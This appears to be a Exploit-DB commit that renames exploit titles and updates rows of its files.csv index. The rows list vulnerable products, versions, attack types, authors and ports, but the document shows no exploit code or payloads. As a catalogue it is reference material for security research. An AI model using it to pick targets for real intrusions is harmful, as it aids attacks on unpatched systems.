DB: 2016-09-27

11 new exploits

Berlios gpsd 2.7.x - Remote Format String
Berlios GPSD 2.7.x - Remote Format String

bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit
Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit

Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)

D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)

boastMachine 3.1 - (mail.php id) SQL Injection
BoastMachine 3.1 - 'mail.php' id SQL Injection

BIGACE 2.4 - Multiple Remote File Inclusion
BigACE 2.4 - Multiple Remote File Inclusion

attachmax dolphin 2.1.0 - Multiple Vulnerabilities
Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities

AtomixMP3 <= 2.3 - (Playlist) Universal Overwrite (SEH)
AtomixMP3 <= 2.3 - 'Playlist' Universal Overwrite (SEH)

BIGACE CMS 2.5 - 'Username' SQL Injection
BigACE CMS 2.5 - 'Username' SQL Injection

BIGACE CMS 2.6 - (cmd) Local File Inclusion
BigACE CMS 2.6 - (cmd) Local File Inclusion

Avast AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation
Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation

DistCC Daemon - Command Execution (Metasploit)
DistCC Daemon - Command Execution (Metasploit) (1)

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)
Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)

Avast 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption
Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption

bitrix site manager 4.0.5 - Remote File Inclusion
Bitrix Site Manager 4.0.5 - Remote File Inclusion

boastMachine 3.1 - Arbitrary File Upload
BoastMachine 3.1 - Arbitrary File Upload

blog system 1.5 - Multiple Vulnerabilities
Blog System 1.5 - Multiple Vulnerabilities

b2b gold script - 'id' SQL Injection
B2B Gold Script - 'id' SQL Injection

TinyBrowser - Arbitrary File Upload
Wordpress Plugin TinyBrowser - Arbitrary File Upload

Nginx http server 0.6.36 - Directory Traversal
Nginx 0.6.36 - Directory Traversal

atomic photo album 1.0.2 - Multiple Vulnerabilities
Atomic Photo Album 1.0.2 - Multiple Vulnerabilities

Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)

Bigace_2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)
BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)

bitweaver 2.8.1 - Persistent Cross-Site Scripting
Bitweaver 2.8.1 - Persistent Cross-Site Scripting

bitweaver 2.8.0 - Multiple Vulnerabilities
Bitweaver 2.8.0 - Multiple Vulnerabilities

Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)
Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)

D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)
D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)

Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)
Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)

Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)

DistCC Daemon - Command Execution (Metasploit)
DistCC Daemon - Command Execution (Metasploit) (2)

Bigace 2.7.5 - Arbitrary File Upload
BigACE 2.7.5 - Arbitrary File Upload

atutor 2.0.2 - Multiple Vulnerabilities
ATutor 2.0.2 - Multiple Vulnerabilities

boastMachine 3.1 - Cross-Site Request Forgery (Add Admin)
BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)

Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)

atmail email server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution
AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution

Macro Expert 4.0 - Multiple Privilege Escalations

axigen mail server 8.0.1 - Persistent Cross-Site Scripting
Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting

Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation

MSI - NTIOLib.sys / WinIO.sys Local Privilege Escalation

Elantech-Smart Pad 11.9.0.0 - Unquoted Service Path Privilege Escalation

Joomla! Component Event Booking 2.10.1 - SQL Injection

NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation

bitweaver 2.8.1 - Multiple Vulnerabilities
Bitweaver 2.8.1 - Multiple Vulnerabilities
Contrexx CMS egov Module 1.0.0 - SQL Injection
Microsoft Windows 10 10586 (x32/x64) / 8.1 Update 2 - NtLoadKeyEx User Hive Attachment Point Privilege Escalation (MS16-111)

White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

atutor 1.2 - Multiple Vulnerabilities
ATutor 1.2 - Multiple Vulnerabilities

Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection
Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection

Clockstone and other CMSMasters Theme - Arbitrary File Upload
Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload

Nginx HTTP Server 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)
Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)

BuilderEngine 3.5.0 - Arbitrary File Upload

PHP Charts 1.0 - (index.php type Parameter) Remote Code Execution
PHP-Charts 1.0 - (index.php type Parameter) Remote Code Execution

Bigace CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)
BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)

BoastMachine 3.1 - admin.php Cross-Site Scripting
BoastMachine 3.1 - 'admin.php' Cross-Site Scripting

Western Digital Arkeia - Remote Code Execution (Metasploit)
Western Digital Arkeia - Remote Code Execution (Metasploit) (1)

Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting
Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting

Redoable 1.2 Theme - header.php s Parameter Cross-Site Scripting
Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting

Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery
Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery

boastMachine 2.8 - 'index.php' Local File Inclusion
BoastMachine 2.8 - 'index.php' Local File Inclusion

TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting

boastMachine 3.1 - 'key' Parameter Cross-Site Scripting
BoastMachine 3.1 - 'key' Parameter Cross-Site Scripting

Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities

WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities

Creative Contact Form 0.9.7 - Arbitrary File Upload
Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting
Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting

Paid Memberships Pro 1.7.14.2 - Directory Traversal
Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal

DukaPress 2.5.2 - Directory Traversal
Wordpress Plugin DukaPress 2.5.2 - Directory Traversal

Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection
Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection

WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting
Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting

Duplicator 0.5.8 - Privilege Escalation
Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation

VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload
Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload

Shareaholic 7.6.0.3 - Cross-Site Scripting
Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

Paypal Currency Converter Basic For WooCommerce - File Read
Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

Wordpess Simple Photo Gallery 1.7.8 - Blind SQL Injection
Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection

Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Download Monitor 3.3.5.4 - 'uploader.php' Multiple Cross-Site Scripting Vulnerabilities
Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting
PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Download Manager 2.2.2 - 'cid' Parameter Cross-Site Scripting
Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting

Western Digital Arkeia - Remote Code Execution (Metasploit)
Western Digital Arkeia - Remote Code Execution (Metasploit) (2)

Multiple WordPress Themes WPScientist - Arbitrary File Upload
Multiple WordPress WPScientist Themes - Arbitrary File Upload

EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities

Avast AntiVirus - X.509 Error Rendering Command Execution
Avast! AntiVirus - X.509 Error Rendering Command Execution

Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting
Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting

miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
Avast - OOB Write Decrypting PEncrypt Packed executables
Avast - JetDb::IsExploited4x Performs Unbounded Search on Input
Avast - Heap Overflow Unpacking MoleBox Archives
Avast - Integer Overflow Verifying numFonts in TTC Header
Avast! - OOB Write Decrypting PEncrypt Packed executables
Avast! - JetDb::IsExploited4x Performs Unbounded Search on Input
Avast! - Heap Overflow Unpacking MoleBox Archives
Avast! - Integer Overflow Verifying numFonts in TTC Header

BIGACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal
BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal

Simple Ads Manager 2.9.4.116 - SQL Injection
Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection

MySQL / MariaDB / PerconaDB 5.5.52 / 5.6.33 / 5.7.15 - Code Execution / Privilege Escalation
MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation

Avast - Authenticode Parsing Memory Corruption
Avast! - Authenticode Parsing Memory Corruption

Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting
Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting

Job Script by Scubez - Remote Code Execution
Wordpress Plugin Job Script by Scubez - Remote Code Execution

Premium SEO Pack 1.9.1.3 - wp_options Overwrite
Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite

Ocomon 2.0 - SQL Injection
Offensive Security 2016-09-27 05:01:25 +00:00
parent a387f0befc
commit 35000196e1
16 changed files with 1413 additions and 135 deletions

files.csv

@ -599,7 +599,7 @@ id,file,description,date,author,platform,type,port
772,platforms/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps,0
773,platforms/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps,0
774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0
775,platforms/linux/remote/775.c,"Berlios gpsd 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947
775,platforms/linux/remote/775.c,"Berlios GPSD 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947
776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0
778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local,0
779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0
@ -1629,7 +1629,7 @@ id,file,description,date,author,platform,type,port
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0
1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - (templatefolder) Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0
1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0
1918,platforms/php/webapps/1918.php,"bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0
1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0
1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0
@ -2136,7 +2136,7 @@ id,file,description,date,author,platform,type,port
2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion",2006-09-26,Kacper,php,webapps,0
2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0
2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0
2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)",2006-09-27,"H D Moore",windows,remote,0
2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",windows,remote,0
2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0
2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0
2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Inclusion",2006-09-27,"Mehmet Ince",php,webapps,0
@ -2462,7 +2462,7 @@ id,file,description,date,author,platform,type,port
2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - (Local File Inclusion / Arbitrary File Upload / Delete) Multiple Vulnerabilities",2006-11-13,r0ut3r,php,webapps,0
2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - (actions_client/gallery.php) Local File Inclusion",2006-11-13,Kacper,php,webapps,0
2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (1) (Metasploit)",2006-11-13,"H D Moore",windows,remote,0
2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0
2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0
2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0
2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0
2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - (vir_Login.asp) Remote Login Bypass",2006-11-13,ajann,asp,webapps,0
@ -4598,7 +4598,7 @@ id,file,description,date,author,platform,type,port
4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,windows,remote,25
4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,php,webapps,0
4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - (blog.php month) SQL Injection",2008-01-21,The_HuliGun,php,webapps,0
4952,platforms/php/webapps/4952.txt,"boastMachine 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0
4952,platforms/php/webapps/4952.txt,"BoastMachine 3.1 - 'mail.php' id SQL Injection",2008-01-21,"Virangar Security",php,webapps,0
4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - 'id' File Disclosure",2008-01-21,shinmai,php,webapps,0
4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php Filename) File Disclosure",2008-01-21,MhZ91,php,webapps,0
4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion",2008-01-21,QTRinux,php,webapps,0
@ -5226,7 +5226,7 @@ id,file,description,date,author,platform,type,port
5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - (category_list.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0
5596,platforms/php/webapps/5596.txt,"BIGACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
@ -6048,7 +6048,7 @@ id,file,description,date,author,platform,type,port
6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php c' SQL Injection",2008-09-15,JosS,php,webapps,0
6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 - Multiple SQL Injections",2008-09-15,SirGod,php,webapps,0
6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex - (produid) SQL Injection",2008-09-16,SirGod,php,webapps,0
6468,platforms/php/webapps/6468.txt,"attachmax dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0
6468,platforms/php/webapps/6468.txt,"Attachmax Dolphin 2.1.0 - Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0
6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 - 'index.php' SQL Injection",2008-09-16,sl4xUz,php,webapps,0
6470,platforms/asp/webapps/6470.txt,"Hotel Reservation System - 'city.asp city' Blind SQL Injection",2008-09-16,JosS,asp,webapps,0
6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / iTunes 8.0 - Remote Off-by-One Crash",2008-09-16,securfrog,multiple,dos,0
@ -7826,7 +7826,7 @@ id,file,description,date,author,platform,type,port
8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - (members.php memid) SQL Injection",2009-03-30,SirGod,php,webapps,0
8310,platforms/windows/dos/8310.pl,"Sami HTTP Server 2.x - (HEAD) Remote Denial of Service",2009-03-30,"Jonathan Salwan",windows,dos,0
8311,platforms/windows/local/8311.py,"Abee Chm eBook Creator 2.11 - 'Filename' Local Stack Overflow",2009-03-30,"Encrypt3d.M!nd ",windows,local,0
8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - (Playlist) Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0
8312,platforms/windows/local/8312.py,"AtomixMP3 <= 2.3 - 'Playlist' Universal Overwrite (SEH)",2009-03-30,His0k4,windows,local,0
8313,platforms/hardware/dos/8313.txt,"Check Point Firewall-1 - PKI Web Service HTTP Header Remote Overflow",2009-03-30,"Bugs NotHugs",hardware,dos,0
8314,platforms/windows/dos/8314.php,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow (PoC)",2009-03-30,"Alfons Luja",windows,dos,0
8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0
@ -8172,7 +8172,7 @@ id,file,description,date,author,platform,type,port
8661,platforms/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,windows,local,0
8662,platforms/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",windows,local,0
8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,windows,local,0
8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
8664,platforms/php/webapps/8664.pl,"BigACE CMS 2.5 - 'Username' SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0
@ -8539,7 +8539,7 @@ id,file,description,date,author,platform,type,port
9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0
9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0
9052,platforms/php/webapps/9052.txt,"BIGACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
9052,platforms/php/webapps/9052.txt,"BigACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0
9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0
@ -9225,7 +9225,7 @@ id,file,description,date,author,platform,type,port
9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / Cross-Site Scripting",2009-09-23,"Alexey Sintsov",php,webapps,0
9829,platforms/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80
9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
9831,platforms/windows/local/9831.txt,"Avast AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0
9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0
9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0
9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
@ -9299,7 +9299,7 @@ id,file,description,date,author,platform,type,port
9912,platforms/cgi/webapps/9912.rb,"AWStats 6.2 < 6.1 - configdir Command Injection (Metasploit)",2005-01-15,"Matteo Cantoni",cgi,webapps,0
9913,platforms/multiple/remote/9913.rb,"ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)",2007-08-24,patrick,multiple,remote,25
9914,platforms/unix/remote/9914.rb,"SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)",2006-06-06,patrick,unix,remote,783
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit)",2002-02-01,"H D Moore",multiple,remote,3632
9915,platforms/multiple/remote/9915.rb,"DistCC Daemon - Command Execution (Metasploit) (1)",2002-02-01,"H D Moore",multiple,remote,3632
9916,platforms/multiple/webapps/9916.rb,"ContentKeeper Web Appliance < 125.10 - Command Execution (Metasploit)",2009-02-25,patrick,multiple,webapps,0
9917,platforms/solaris/remote/9917.rb,"Solaris in.TelnetD TTYPROMPT - Buffer Overflow (Metasploit)",2002-01-18,MC,solaris,remote,23
9918,platforms/solaris/remote/9918.rb,"Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)",2007-02-12,MC,solaris,remote,23
@ -9317,7 +9317,7 @@ id,file,description,date,author,platform,type,port
9931,platforms/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",osx,remote,548
9932,platforms/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,novell,remote,0
9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,multiple,remote,0
9934,platforms/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (1)",2009-07-10,kf,multiple,remote,0
9935,platforms/multiple/remote/9935.rb,"Subversion 1.0.2 - Date Overflow (Metasploit)",2004-05-19,spoonm,multiple,remote,3690
9936,platforms/linux/remote/9936.rb,"Samba 2.2.x - nttrans Overflow (Metasploit)",2003-04-07,"H D Moore",linux,remote,139
9937,platforms/multiple/remote/9937.rb,"RealServer 7-9 - Describe Buffer Overflow (Metasploit)",2002-12-20,"H D Moore",multiple,remote,0
@ -9477,7 +9477,7 @@ id,file,description,date,author,platform,type,port
10103,platforms/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - (jar50.dll) Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos,0
10104,platforms/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service",2009-11-13,zhangmc,windows,dos,21
10105,platforms/php/webapps/10105.txt,"Cifshanghai - 'chanpin_info.php' CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
